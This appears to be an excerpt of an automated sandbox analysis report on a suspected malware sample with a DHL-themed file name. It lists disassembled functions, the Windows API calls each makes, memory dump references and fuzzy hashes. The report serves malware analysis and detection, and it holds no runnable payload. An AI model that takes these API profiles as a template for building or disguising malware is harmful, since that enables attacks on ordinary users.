                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3970641297-0
                                                                                      • Opcode ID: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                                                                      • Instruction ID: 8e58992780ffa529b7ccd6e83a4580c24e0012c0ab5d92180ad4cfcc8a17ec26
                                                                                      • Opcode Fuzzy Hash: 023f6f147e3ef56352576afa6e8c9fd92ade55e37cdc71aea0f56c02f7703db8
                                                                                      • Instruction Fuzzy Hash: C3115B72501548BFEF264FA4DC55EEBBBADEF093A4F044215FA1892120D736EC609BA0
                                                                                      Function 00053B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00053B56
                                                                                        • Part of subcall function 00053AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00053AD2
                                                                                        • Part of subcall function 00053AA3: ___AdjustPointer.LIBCMT ref: 00053AED
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00053B6B
                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00053B7C
                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00053BA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 737400349-0
                                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                      • Instruction ID: ccd8080e06b4f5f0c074af5d8e5e2d3cbf6e9601b68b9ebc78007fbe908e5fcf
                                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                      • Instruction Fuzzy Hash: FD014C32100148BBDF125E95CC42EEB7FADEF48799F044014FE4896122C732E965DBA0
                                                                                      Function 00063073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000313C6,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue), ref: 000630A5
                                                                                      • GetLastError.KERNEL32(?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000,00000364,?,00062E46), ref: 000630B1
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006301A,000313C6,00000000,00000000,00000000,?,0006328B,00000006,FlsSetValue,000D2290,FlsSetValue,00000000), ref: 000630BF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                                                                      • Instruction ID: da791f5f3d99fc716246a8cef39bd1493f956986c9ad78b99aeda9b1fe2bddbf
                                                                                      • Opcode Fuzzy Hash: 47b0de6ec336c0a5261cf801cc1356613aa858c7fadec58a55e0ebd4d4ecf9d1
                                                                                      • Instruction Fuzzy Hash: 78012B32301222ABFB314BB9EC54E577BDAEF05BA1B100720F909E3140CB35D909C6E0
                                                                                      Function 00097464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0009747F
                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00097497
                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000974AC
                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 000974CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                      • String ID:
                                                                                      • API String ID: 1352324309-0
                                                                                      • Opcode ID: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                                                                      • Instruction ID: 9c5d31441ef7851624e00bd2014e538c4c7f9858a060c3292139efcfb185ecbe
                                                                                      • Opcode Fuzzy Hash: 42aa0b5e6e70ea2cc3061012f530c04c45211cec68bc2c6bb921c92df4e11e07
                                                                                      • Instruction Fuzzy Hash: 2C118BB2215310ABFB308F14DC08F967BFCEB00B00F108569EA1ED6192D7B4E904EBA0
                                                                                      Function 0009B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0C4
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0E9
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B0F3
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0009ACD3,?,00008000), ref: 0009B126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                      • String ID:
                                                                                      • API String ID: 2875609808-0
                                                                                      • Opcode ID: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                                                                      • Instruction ID: e1c38ae4d654d7f73c6dc24b882f6e652acdde96b7718d62ce4d0d0e1b676581
                                                                                      • Opcode Fuzzy Hash: 0a3bccea388bffcb1d0153e5fc3544b8e90e51ea062ca56ec4140a7ac2330551
                                                                                      • Instruction Fuzzy Hash: A011AD70C0062CE7EF10AFE5EA68AEEBF78FF4A321F014095D951B2181CB348A50DB91
                                                                                      Function 000C7E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(?,?), ref: 000C7E33
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C7E4B
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C7E6F
                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C7E8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 357397906-0
                                                                                      • Opcode ID: 4bb7961506d6e24ffb57201a57b4974104008908a96d7d354b602dc16d7a6543
                                                                                      • Instruction ID: f46e47f550538d1c494ccc3a90d7283514815051053d504c7f4693f3f1d35587
                                                                                      • Opcode Fuzzy Hash: 4bb7961506d6e24ffb57201a57b4974104008908a96d7d354b602dc16d7a6543
                                                                                      • Instruction Fuzzy Hash: E51143B9D0420AAFEB41CF98C984EEEBBF5FB08310F505156E915E2210D735AA55CF50
                                                                                      Function 00092DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00092DDD
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2710830443-0
                                                                                      • Opcode ID: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                                                                      • Instruction ID: d60a6e998a48b001cca3257550be6f3a0831b39b78bd92ee7e69180781427880
                                                                                      • Opcode Fuzzy Hash: 98ac2d8b5bf19ca6179f735499e8db3bc60afcf33c767f3a656a7700de320dc3
                                                                                      • Instruction Fuzzy Hash: 2BE092715022247BFB201B73DC0DFEB3E6CEF43BA5F010015F50AD10809AA8C841D6B0
                                                                                      Function 000C8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                                                                        • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 000C8887
                                                                                      • LineTo.GDI32(?,?,?), ref: 000C8894
                                                                                      • EndPath.GDI32(?), ref: 000C88A4
                                                                                      • StrokePath.GDI32(?), ref: 000C88B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                      • String ID:
                                                                                      • API String ID: 1539411459-0
                                                                                      • Opcode ID: edc7891ec052f00dde446346c8cf63ec379dcf9af3cdaf5e558f4776b8ace309
                                                                                      • Instruction ID: 4c6578dbfd07e162e59428d7d0f497ff233421bd74299c0073bec4df52c6f141
                                                                                      • Opcode Fuzzy Hash: edc7891ec052f00dde446346c8cf63ec379dcf9af3cdaf5e558f4776b8ace309
                                                                                      • Instruction Fuzzy Hash: 47F03436041258BBFB126F94AC0AFDE3A69AF0A310F148104FA55654E2CBB95561CBA9
                                                                                      Function 000498B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000008), ref: 000498CC
                                                                                      • SetTextColor.GDI32(?,?), ref: 000498D6
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 000498E9
                                                                                      • GetStockObject.GDI32(00000005), ref: 000498F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$ModeObjectStockText
                                                                                      • String ID:
                                                                                      • API String ID: 4037423528-0
                                                                                      • Opcode ID: 5cb8c29fb86a23093ba78e0c05c0857b333fd59d8c3a7904d737c099d0783669
                                                                                      • Instruction ID: 628aa6b61b54e910c8ae05e7aa8acb465dbfc8bb37d02677df2acf93bf791d81
                                                                                      • Opcode Fuzzy Hash: 5cb8c29fb86a23093ba78e0c05c0857b333fd59d8c3a7904d737c099d0783669
                                                                                      • Instruction Fuzzy Hash: 8BE06531644680AEFB215B75FC09FDD3F50AB12335F188219FAFD540E1C77586409B10
                                                                                      Function 0009162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThread.KERNEL32 ref: 00091634
                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009163B
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000911D9), ref: 00091648
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,000911D9), ref: 0009164F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                      • String ID:
                                                                                      • API String ID: 3974789173-0
                                                                                      • Opcode ID: 92bffd25cada180dfc80503b1cad5ecdeb26fcc0c38be2f68db60df31f79bf83
                                                                                      • Instruction ID: f9f4f9b2c316d5adea1ad48d965a44bd4c3b94c5a0390887efcb700ccdfcb717
                                                                                      • Opcode Fuzzy Hash: 92bffd25cada180dfc80503b1cad5ecdeb26fcc0c38be2f68db60df31f79bf83
                                                                                      • Instruction Fuzzy Hash: FAE08671A01211EBFB601FA0ED0DF863BBDBF44791F184808F249C9090D63C8441C750
                                                                                      Function 0008D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 0008D858
                                                                                      • GetDC.USER32(00000000), ref: 0008D862
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                                                                      • ReleaseDC.USER32(?), ref: 0008D8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 7acbd3852a6e8d0ae55c1992e12acd7c78773303d435d541c6464406644b24fe
                                                                                      • Instruction ID: 93eb2f004d95c300522832b60da4934074bc92019325bb445303f0b25f063cb2
                                                                                      • Opcode Fuzzy Hash: 7acbd3852a6e8d0ae55c1992e12acd7c78773303d435d541c6464406644b24fe
                                                                                      • Instruction Fuzzy Hash: F2E09AB5800205DFEB51AFA0D90CE6DBBB5FB08311F248459E84AE7260CB399942AF50
                                                                                      Function 0008D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 0008D86C
                                                                                      • GetDC.USER32(00000000), ref: 0008D876
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008D882
                                                                                      • ReleaseDC.USER32(?), ref: 0008D8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 0e01f8c79d87e93cd922b491f9152c1281dc116c046972283da04278664986ed
                                                                                      • Instruction ID: 7f89e5ccc6f84e7aff5e8c485d32a4bac17aa66a8d4e455243f01fce0c072ed1
                                                                                      • Opcode Fuzzy Hash: 0e01f8c79d87e93cd922b491f9152c1281dc116c046972283da04278664986ed
                                                                                      • Instruction Fuzzy Hash: 47E092B5800204EFEB51AFA0D90CE6DBBB5BB08311F248459E94AE7260CB3D9902AF50
                                                                                      Function 000A4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 000A4ED4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Connection_wcslen
                                                                                      • String ID: *$LPT
                                                                                      • API String ID: 1725874428-3443410124
                                                                                      • Opcode ID: b0b6bdcecbf3941211c6ab63e930aa28cc0ec90be171aaaf213c04e1238dbb89
                                                                                      • Instruction ID: bda04ad2adaa8a4db1bee56266379e7962aebe204c873e3c2453f69d09d2b567
                                                                                      • Opcode Fuzzy Hash: b0b6bdcecbf3941211c6ab63e930aa28cc0ec90be171aaaf213c04e1238dbb89
                                                                                      • Instruction Fuzzy Hash: 17917279900204DFCB55DF94C484EAABBF5BF85304F1580A9E40A9F362C775ED85CB50
                                                                                      Function 0005E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0005E30D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorHandling__start
                                                                                      • String ID: pow
                                                                                      • API String ID: 3213639722-2276729525
                                                                                      • Opcode ID: 08672c7efe3c13eddd3d3defab04b61c502420c0e2f9849dcbc95a449556b43c
                                                                                      • Instruction ID: aa14851e9872179f7e8414ba1838c67fa90badc1f0b4531e9fc3a1a3de79ea78
                                                                                      • Opcode Fuzzy Hash: 08672c7efe3c13eddd3d3defab04b61c502420c0e2f9849dcbc95a449556b43c
                                                                                      • Instruction Fuzzy Hash: CB519D61A0C20196DB297714CD053BF3BE5EF10746F304DA9E8DA422E9EB358ECD9A42
                                                                                      Function 0004E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 8139a65d16e59c826f17e254fc02708281e0847ba5afd8c6c03596315724ccf1
                                                                                      • Instruction ID: 4b426c0fa4738efaa44134e813aed1a59e08195f93fee0c81e9baf77680401ba
                                                                                      • Opcode Fuzzy Hash: 8139a65d16e59c826f17e254fc02708281e0847ba5afd8c6c03596315724ccf1
                                                                                      • Instruction Fuzzy Hash: F25133B5608286DFDB65EF28C481AFE7BE8FF15310F248065EC919B2D1DA749D42CB90
                                                                                      Function 0004F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(00000000), ref: 0004F2A2
                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0004F2BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
